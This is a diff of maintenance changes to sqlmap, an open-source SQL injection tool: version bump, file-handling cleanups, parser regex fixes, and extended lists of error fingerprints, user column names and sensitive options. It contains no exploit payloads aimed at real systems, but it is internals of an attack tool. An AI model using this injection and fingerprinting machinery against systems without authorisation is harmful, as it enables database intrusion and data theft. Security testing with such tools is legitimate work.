|
||||
key = None
|
||||
|
||||
for line in openFile(paths.COMMON_OUTPUTS, 'r'):
|
||||
if line.find('#') != -1:
|
||||
line = line[:line.find('#')]
|
||||
with openFile(paths.COMMON_OUTPUTS, 'r') as f:
|
||||
for line in f:
|
||||
if line.find('#') != -1:
|
||||
line = line[:line.find('#')]
|
||||
|
||||
line = line.strip()
|
||||
line = line.strip()
|
||||
|
||||
if len(line) > 1:
|
||||
if line.startswith('[') and line.endswith(']'):
|
||||
key = line[1:-1]
|
||||
elif key:
|
||||
if key not in kb.commonOutputs:
|
||||
kb.commonOutputs[key] = set()
|
||||
if len(line) > 1:
|
||||
if line.startswith('[') and line.endswith(']'):
|
||||
key = line[1:-1]
|
||||
elif key:
|
||||
if key not in kb.commonOutputs:
|
||||
kb.commonOutputs[key] = set()
|
||||
|
||||
if line not in kb.commonOutputs[key]:
|
||||
kb.commonOutputs[key].add(line)
|
||||
if line not in kb.commonOutputs[key]:
|
||||
kb.commonOutputs[key].add(line)
|
||||
|
||||
def getFileItems(filename, commentPrefix='#', unicoded=True, lowercase=False, unique=False):
|
||||
"""
|
||||
@@ -3711,10 +3716,12 @@ def joinValue(value, delimiter=','):
|
||||
'1,2'
|
||||
>>> joinValue('1')
|
||||
'1'
|
||||
>>> joinValue(['1', None])
|
||||
'1,None'
|
||||
"""
|
||||
|
||||
if isListLike(value):
|
||||
retVal = delimiter.join(value)
|
||||
retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value)
|
||||
else:
|
||||
retVal = value
|
||||
|
||||
@@ -4643,7 +4650,7 @@ def isAdminFromPrivileges(privileges):
|
||||
|
||||
return retVal
|
||||
|
||||
def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
def findPageForms(content, url, raiseException=False, addToTargets=False):
|
||||
"""
|
||||
Parses given page content for possible forms (Note: still not implemented for Python3)
|
||||
|
||||
@@ -4661,7 +4668,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not content:
|
||||
errMsg = "can't parse forms as the page content appears to be blank"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4683,7 +4690,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
forms = ParseResponse(filtered, backwards_compat=False)
|
||||
except:
|
||||
errMsg = "no success"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4710,7 +4717,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
except (ValueError, TypeError) as ex:
|
||||
errMsg = "there has been a problem while "
|
||||
errMsg += "processing page forms ('%s')" % getSafeExString(ex)
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -4762,7 +4769,7 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
|
||||
|
||||
if not retVal and not conf.crawlDepth:
|
||||
errMsg = "there were no forms found at the given target URL"
|
||||
if raise_:
|
||||
if raiseException:
|
||||
raise SqlmapGenericException(errMsg)
|
||||
else:
|
||||
logger.debug(errMsg)
|
||||
@@ -5271,6 +5278,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
Parses WebScarab logs (POST method not supported)
|
||||
"""
|
||||
|
||||
if WEBSCARAB_SPLITTER not in content:
|
||||
return
|
||||
|
||||
reqResList = content.split(WEBSCARAB_SPLITTER)
|
||||
|
||||
for request in reqResList:
|
||||
@@ -5354,6 +5364,8 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
if not line.strip() and index == len(lines) - 1:
|
||||
break
|
||||
|
||||
line = re.sub(INJECT_HERE_REGEX, CUSTOM_INJECTION_MARK_CHAR, line)
|
||||
|
||||
newline = "\r\n" if line.endswith('\r') else '\n'
|
||||
line = line.strip('\r')
|
||||
match = re.search(r"\A([A-Z]+) (.+) HTTP/[\d.]+\Z", line) if not method else None
|
||||
@@ -5398,9 +5410,9 @@ def parseRequestFile(reqFile, checkParams=True):
|
||||
|
||||
port = extractRegexResult(r":(?P<result>\d+)\Z", value)
|
||||
if port:
|
||||
value = value[:-(1 + len(port))]
|
||||
|
||||
host = value
|
||||
host = value[:-(1 + len(port))]
|
||||
else:
|
||||
host = value
|
||||
|
||||
# Avoid to add a static content length header to
|
||||
# headers and consider the following lines as
|
||||
@@ -5594,7 +5606,9 @@ def checkSums():
|
||||
expected, filename = match.groups()
|
||||
filepath = os.path.join(paths.SQLMAP_ROOT_PATH, filename).replace('/', os.path.sep)
|
||||
checkFile(filepath)
|
||||
if not hashlib.sha256(open(filepath, "rb").read()).hexdigest() == expected:
|
||||
with open(filepath, "rb") as f:
|
||||
content = f.read()
|
||||
if not hashlib.sha256(content).hexdigest() == expected:
|
||||
retVal &= False
|
||||
break
|
||||
|
||||
|
||||
@@ -435,7 +435,7 @@ def _setStdinPipeTargets():
|
||||
def next(self):
|
||||
try:
|
||||
line = next(conf.stdinPipe)
|
||||
except (IOError, OSError, TypeError):
|
||||
except (IOError, OSError, TypeError, UnicodeDecodeError):
|
||||
line = None
|
||||
|
||||
if line:
|
||||
@@ -812,6 +812,7 @@ def _setTamperingFunctions():
|
||||
raise SqlmapSyntaxException("cannot import tamper module '%s' (%s)" % (getUnicode(filename[:-3]), getSafeExString(ex)))
|
||||
|
||||
priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__
|
||||
priority = priority if priority is not None else PRIORITY.LOWEST
|
||||
|
||||
for name, function in inspect.getmembers(module, inspect.isfunction):
|
||||
if name == "tamper" and (hasattr(inspect, "signature") and all(_ in inspect.signature(function).parameters for _ in ("payload", "kwargs")) or inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs"):
|
||||
@@ -1360,7 +1361,7 @@ def _setHTTPAuthentication():
|
||||
errMsg += "be in format 'DOMAIN\\username:password'"
|
||||
elif authType == AUTH_TYPE.PKI:
|
||||
errMsg = "HTTP PKI authentication require "
|
||||
errMsg += "usage of option `--auth-pki`"
|
||||
errMsg += "usage of option `--auth-file`"
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
aCredRegExp = re.search(regExp, conf.authCred)
|
||||
@@ -2090,6 +2091,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
|
||||
kb.headersFp = {}
|
||||
kb.heuristicDbms = None
|
||||
kb.heuristicExtendedDbms = None
|
||||
kb.heuristicCode = None
|
||||
kb.heuristicMode = False
|
||||
kb.heuristicPage = False
|
||||
kb.heuristicTest = None
|
||||
|
||||
@@ -8,6 +8,7 @@ See the file 'LICENSE' for copying permission
|
||||
import codecs
|
||||
import collections
|
||||
import inspect
|
||||
import logging
|
||||
import os
|
||||
import random
|
||||
import re
|
||||
@@ -37,9 +38,12 @@ from lib.core.data import conf
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.option import _setHTTPHandlers
|
||||
from lib.core.option import setVerbosity
|
||||
from lib.core.settings import INVALID_UNICODE_PRIVATE_AREA
|
||||
from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.request.templates import getPageTemplate
|
||||
from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
from thirdparty.six.moves import http_client as _http_client
|
||||
|
||||
_rand = 0
|
||||
@@ -86,7 +90,7 @@ def dirtyPatches():
|
||||
if match and match.group(1).upper() != PLACE.POST:
|
||||
PLACE.CUSTOM_POST = PLACE.CUSTOM_POST.replace("POST", "%s (body)" % match.group(1))
|
||||
|
||||
# https://github.com/sqlmapproject/sqlmap/issues/4314
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/4314
|
||||
try:
|
||||
os.urandom(1)
|
||||
except NotImplementedError:
|
||||
@@ -95,6 +99,14 @@ def dirtyPatches():
|
||||
else:
|
||||
os.urandom = lambda size: "".join(chr(random.randint(0, 255)) for _ in xrange(size))
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/5727
|
||||
# Reference: https://stackoverflow.com/a/14076841
|
||||
try:
|
||||
import pymysql
|
||||
pymysql.install_as_MySQLdb()
|
||||
except (ImportError, AttributeError):
|
||||
pass
|
||||
|
||||
# Reference: https://github.com/bottlepy/bottle/blob/df67999584a0e51ec5b691146c7fa4f3c87f5aac/bottle.py
|
||||
# Reference: https://python.readthedocs.io/en/v2.7.2/library/inspect.html#inspect.getargspec
|
||||
if not hasattr(inspect, "getargspec") and hasattr(inspect, "getfullargspec"):
|
||||
@@ -115,6 +127,30 @@ def dirtyPatches():
|
||||
|
||||
inspect.getargspec = getargspec
|
||||
|
||||
# Installing "reversible" unicode (decoding) error handler
|
||||
def _reversible(ex):
|
||||
if INVALID_UNICODE_PRIVATE_AREA:
|
||||
return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
else:
|
||||
return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
|
||||
codecs.register_error("reversible", _reversible)
|
||||
|
||||
# Reference: https://github.com/sqlmapproject/sqlmap/issues/5731
|
||||
if not hasattr(logging, "_acquireLock"):
|
||||
def _acquireLock():
|
||||
if logging._lock:
|
||||
logging._lock.acquire()
|
||||
|
||||
logging._acquireLock = _acquireLock
|
||||
|
||||
if not hasattr(logging, "_releaseLock"):
|
||||
def _releaseLock():
|
||||
if logging._lock:
|
||||
logging._lock.release()
|
||||
|
||||
logging._releaseLock = _releaseLock
|
||||
|
||||
def resolveCrossReferences():
|
||||
"""
|
||||
Place for cross-reference resolution
|
||||
|
||||
@@ -17,10 +17,9 @@ from lib.core.enums import DBMS
|
||||
from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||
from lib.core.enums import OS
|
||||
from thirdparty import six
|
||||
from thirdparty.six import unichr as _unichr
|
||||
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.8.4.0"
|
||||
VERSION = "1.8.12.0"
|
||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||
@@ -61,6 +60,9 @@ LIVE_COOKIES_TIMEOUT = 120
|
||||
LOWER_RATIO_BOUND = 0.02
|
||||
UPPER_RATIO_BOUND = 0.98
|
||||
|
||||
# For filling in case of dumb push updates
|
||||
DUMMY_JUNK = "Gu8ohxi9"
|
||||
|
||||
# Markers for special cases when parameter values contain html encoded characters
|
||||
PARAMETER_AMP_MARKER = "__AMP__"
|
||||
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
||||
@@ -443,7 +445,7 @@ COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "
|
||||
WEBSCARAB_SPLITTER = "### Conversation"
|
||||
|
||||
# Splitter used between requests in BURP log files
|
||||
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+={10,}"
|
||||
BURP_REQUEST_REGEX = r"={10,}\s+([A-Z]{3,} .+?)\s+(={10,}|\Z)"
|
||||
|
||||
# Regex used for parsing XML Burp saved history items
|
||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.*?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||
@@ -461,7 +463,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
||||
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*\b%s\b[^\s]*)\s"
|
||||
|
||||
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
|
||||
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred", "sqlQuery", "requestFile")
|
||||
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred", "sqlQuery", "requestFile", "csrfToken", "csrfData", "csrfUrl", "testParameter")
|
||||
|
||||
# Maximum number of threads (avoiding connection issues and/or DoS)
|
||||
MAX_NUMBER_OF_THREADS = 10
|
||||
@@ -544,8 +546,8 @@ IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__VIEWSTATEGENERATO
|
||||
# Regular expression used for recognition of ASP.NET control parameters
|
||||
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
|
||||
|
||||
# Prefix for Google analytics cookie names
|
||||
GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
|
||||
# Regex for Google analytics cookie names
|
||||
GOOGLE_ANALYTICS_COOKIE_REGEX = r"(?i)\A(__utm|_ga|_gid|_gat|_gcl_au)"
|
||||
|
||||
# Prefix for configuration overriding environment variables
|
||||
SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
|
||||
@@ -687,7 +689,7 @@ PARAMETER_SPLITTING_REGEX = r"[,|;]"
|
||||
UNENCODED_ORIGINAL_VALUE = "original"
|
||||
|
||||
# Common column names containing usernames (used for hash cracking in some cases)
|
||||
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "cuser")
|
||||
COMMON_USER_COLUMNS = ("login", "user", "username", "user_name", "user_login", "account", "account_name", "benutzername", "benutzer", "utilisateur", "usager", "consommateur", "utente", "utilizzatore", "utilizator", "utilizador", "usufrutuario", "korisnik", "uporabnik", "usuario", "consumidor", "client", "customer", "cuser")
|
||||
|
||||
# Default delimiter in GET/POST values
|
||||
DEFAULT_GET_POST_DELIMITER = '&'
|
||||
@@ -795,7 +797,7 @@ BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be i
|
||||
RANDOMIZATION_TLDS = ("com", "net", "ru", "org", "de", "uk", "br", "jp", "cn", "fr", "it", "pl", "tv", "edu", "in", "ir", "es", "me", "info", "gr", "gov", "ca", "co", "se", "cz", "to", "vn", "nl", "cc", "az", "hu", "ua", "be", "no", "biz", "io", "ch", "ro", "sk", "eu", "us", "tw", "pt", "fi", "at", "lt", "kz", "cl", "hr", "pk", "lv", "la", "pe", "au")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "public_html", "wwwroot", "www", "site")
|
||||
|
||||
# Maximum length of a help part containing switch/option name(s)
|
||||
MAX_HELP_OPTION_LENGTH = 18
|
||||
@@ -804,7 +806,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
||||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException", "Arguments are of the wrong type")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Please enter a", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "TypeMismatchException", "CF_SQL_INTEGER", "CF_SQL_NUMERIC", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "Attribute validation error for tag", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException", "Arguments are of the wrong type", "Invalid conversion")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
@@ -956,12 +958,3 @@ for key, value in os.environ.items():
|
||||
globals()[_] = [__.strip() for __ in _.split(',')]
|
||||
else:
|
||||
globals()[_] = value
|
||||
|
||||
# Installing "reversible" unicode (decoding) error handler
|
||||
def _reversible(ex):
|
||||
if INVALID_UNICODE_PRIVATE_AREA:
|
||||
return (u"".join(_unichr(int('000f00%2x' % (_ if isinstance(_, int) else ord(_)), 16)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
else:
|
||||
return (u"".join(INVALID_UNICODE_CHAR_FORMAT % (_ if isinstance(_, int) else ord(_)) for _ in ex.object[ex.start:ex.end]), ex.end)
|
||||
|
||||
codecs.register_error("reversible", _reversible)
|
||||
|
||||
@@ -74,7 +74,7 @@ def vulnTest():
|
||||
("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
|
||||
("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
|
||||
("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")),
|
||||
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)),
|
||||
("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5,foobar,nameisnull", "'987654321'",)),
|
||||
("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
|
||||
)
|
||||
|
||||
@@ -162,7 +162,9 @@ def vulnTest():
|
||||
direct = "sqlite3://%s" % database
|
||||
tmpdir = tempfile.mkdtemp()
|
||||
|
||||
content = open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))).read().replace("url =", "url = %s" % url)
|
||||
with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f:
|
||||
content = f.read().replace("url =", "url = %s" % url)
|
||||
|
||||
with open(config, "w+") as f:
|
||||
f.write(content)
|
||||
f.flush()
|
||||
@@ -214,7 +216,9 @@ def smokeTest():
|
||||
|
||||
unisonRandom()
|
||||
|
||||
content = open(paths.ERRORS_XML, "r").read()
|
||||
with open(paths.ERRORS_XML, "r") as f:
|
||||
content = f.read()
|
||||
|
||||
for regex in re.findall(r'<error regexp="(.+?)"/>', content):
|
||||
try:
|
||||
re.compile(regex)
|
||||
|
||||
@@ -68,7 +68,10 @@ def configFileParser(configFile):
|
||||
|
||||
try:
|
||||
config = UnicodeRawConfigParser()
|
||||
config.readfp(configFP)
|
||||
if hasattr(config, "read_file"):
|
||||
config.read_file(configFP)
|
||||
else:
|
||||
config.readfp(configFP)
|
||||
except Exception as ex:
|
||||
errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex)
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
@@ -282,15 +282,8 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
if not page or (conf.nullConnection and len(page) < 2):
|
||||
return getUnicode(page)
|
||||
|
||||
if hasattr(contentEncoding, "lower"):
|
||||
contentEncoding = contentEncoding.lower()
|
||||
else:
|
||||
contentEncoding = ""
|
||||
|
||||
if hasattr(contentType, "lower"):
|
||||
contentType = contentType.lower()
|
||||
else:
|
||||
contentType = ""
|
||||
contentEncoding = contentEncoding.lower() if hasattr(contentEncoding, "lower") else ""
|
||||
contentType = contentType.lower() if hasattr(contentType, "lower") else ""
|
||||
|
||||
if contentEncoding in ("gzip", "x-gzip", "deflate"):
|
||||
if not kb.pageCompress:
|
||||
@@ -382,7 +375,6 @@ def decodePage(page, contentEncoding, contentType, percentDecode=True):
|
||||
|
||||
def processResponse(page, responseHeaders, code=None, status=None):
|
||||
kb.processResponseCounter += 1
|
||||
|
||||
page = page or ""
|
||||
|
||||
parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None, status)
|
||||
|
||||
@@ -297,11 +297,11 @@ class Connect(object):
|
||||
finalCode = kwargs.get("finalCode", False)
|
||||
chunked = kwargs.get("chunked", False) or conf.chunked
|
||||
|
||||
start = time.time()
|
||||
|
||||
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
||||
time.sleep(conf.delay)
|
||||
|
||||
start = time.time()
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
with kb.locks.request:
|
||||
kb.requestCounter += 1
|
||||
@@ -914,12 +914,6 @@ class Connect(object):
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
|
||||
finally:
|
||||
if isinstance(page, six.binary_type):
|
||||
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
|
||||
page = six.text_type(page, errors="ignore")
|
||||
else:
|
||||
page = getUnicode(page)
|
||||
|
||||
for function in kb.postprocessFunctions:
|
||||
try:
|
||||
page, responseHeaders, code = function(page, responseHeaders, code)
|
||||
@@ -928,6 +922,12 @@ class Connect(object):
|
||||
errMsg += "function '%s' ('%s')" % (function.__name__, getSafeExString(ex))
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if isinstance(page, six.binary_type):
|
||||
if HTTP_HEADER.CONTENT_TYPE in (responseHeaders or {}) and not re.search(TEXT_CONTENT_TYPE_REGEX, responseHeaders[HTTP_HEADER.CONTENT_TYPE]):
|
||||
page = six.text_type(page, errors="ignore")
|
||||
else:
|
||||
page = getUnicode(page)
|
||||
|
||||
for _ in (getattr(conn, "redcode", None), code):
|
||||
if _ is not None and _ in conf.abortCode:
|
||||
errMsg = "aborting due to detected HTTP code '%d'" % _
|
||||
@@ -1183,7 +1183,7 @@ class Connect(object):
|
||||
if match:
|
||||
retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), ("%s=%s" % (parameter, newValue)).replace('\\', r'\\'), paramString)
|
||||
else:
|
||||
match = re.search(r"(%s[\"']:[\"'])([^\"']+)" % re.escape(parameter), paramString, re.I)
|
||||
match = re.search(r"(%s[\"']\s*:\s*[\"'])([^\"']*)" % re.escape(parameter), paramString, re.I)
|
||||
if match:
|
||||
retVal = re.sub(r"(?i)%s" % re.escape(match.group(0)), "%s%s" % (match.group(1), newValue), paramString)
|
||||
|
||||
@@ -1367,18 +1367,18 @@ class Connect(object):
|
||||
|
||||
for variable in list(variables.keys()):
|
||||
if unsafeVariableNaming(variable) != variable:
|
||||
value = variables[variable]
|
||||
entry = variables[variable]
|
||||
del variables[variable]
|
||||
variables[unsafeVariableNaming(variable)] = value
|
||||
variables[unsafeVariableNaming(variable)] = entry
|
||||
|
||||
uri = variables["uri"]
|
||||
cookie = variables["cookie"]
|
||||
|
||||
for name, value in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
if isinstance(value, (int, float, six.string_types, six.binary_type)):
|
||||
for name, entry in variables.items():
|
||||
if name != "__builtins__" and originals.get(name, "") != entry:
|
||||
if isinstance(entry, (int, float, six.string_types, six.binary_type)):
|
||||
found = False
|
||||
value = getUnicode(value, UNICODE_ENCODING)
|
||||
entry = getUnicode(entry, UNICODE_ENCODING)
|
||||
|
||||
if kb.postHint == POST_HINT.MULTIPART:
|
||||
boundary = "--%s" % re.search(r"boundary=([^\s]+)", contentType).group(1)
|
||||
@@ -1396,7 +1396,7 @@ class Connect(object):
|
||||
found = True
|
||||
first = match.group(0)
|
||||
second = part[len(first):]
|
||||
second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(value), second)
|
||||
second = re.sub(r"(?s).+?(\r?\n?\-*\Z)", r"%s\g<1>" % re.escape(entry), second)
|
||||
parts[i] = "%s%s" % (first, second)
|
||||
post = boundary.join(parts)
|
||||
|
||||
@@ -1404,10 +1404,10 @@ class Connect(object):
|
||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||
if re.search(r"<%s\b" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
elif kb.postHint in (POST_HINT.JSON, POST_HINT.JSON_LIKE):
|
||||
match = re.search(r"['\"]%s['\"]:" % re.escape(name), post)
|
||||
@@ -1417,31 +1417,31 @@ class Connect(object):
|
||||
match = re.search(r"(%s%s%s:\s*)(\d+|%s[^%s]*%s)" % (quote, re.escape(name), quote, quote, quote, quote), post)
|
||||
if match:
|
||||
found = True
|
||||
post = post.replace(match.group(0), "%s%s" % (match.group(1), value if value.isdigit() else "%s%s%s" % (match.group(0)[0], value, match.group(0)[0])))
|
||||
post = post.replace(match.group(0), "%s%s" % (match.group(1), entry if entry.isdigit() else "%s%s%s" % (match.group(0)[0], entry, match.group(0)[0])))
|
||||
post = post.replace(BOUNDARY_BACKSLASH_MARKER, "\\%s" % quote)
|
||||
|
||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(regex, r"\g<1>\g<2>%s" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
post = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), post)
|
||||
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||
get = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), get)
|
||||
|
||||
if re.search(regex, (query or "")):
|
||||
found = True
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), uri)
|
||||
|
||||
regex = r"((\A|%s\s*)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||
if re.search(regex, (cookie or "")):
|
||||
found = True
|
||||
cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||
cookie = re.sub(regex, r"\g<1>%s\g<3>" % entry.replace('\\', r'\\'), cookie)
|
||||
|
||||
if not found:
|
||||
if post is not None:
|
||||
@@ -1449,13 +1449,13 @@ class Connect(object):
|
||||
match = re.search(r"['\"]", post)
|
||||
if match:
|
||||
quote = match.group(0)
|
||||
post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, value if value.isdigit() else "%s%s%s" % (quote, value, quote))), post)
|
||||
post = re.sub(r"\}\Z", "%s%s}" % (',' if re.search(r"\w", post) else "", "%s%s%s:%s" % (quote, name, quote, entry if entry.isdigit() else "%s%s%s" % (quote, entry, quote))), post)
|
||||
else:
|
||||
post += "%s%s=%s" % (delimiter, name, value)
|
||||
post += "%s%s=%s" % (delimiter, name, entry)
|
||||
elif get is not None:
|
||||
get += "%s%s=%s" % (delimiter, name, value)
|
||||
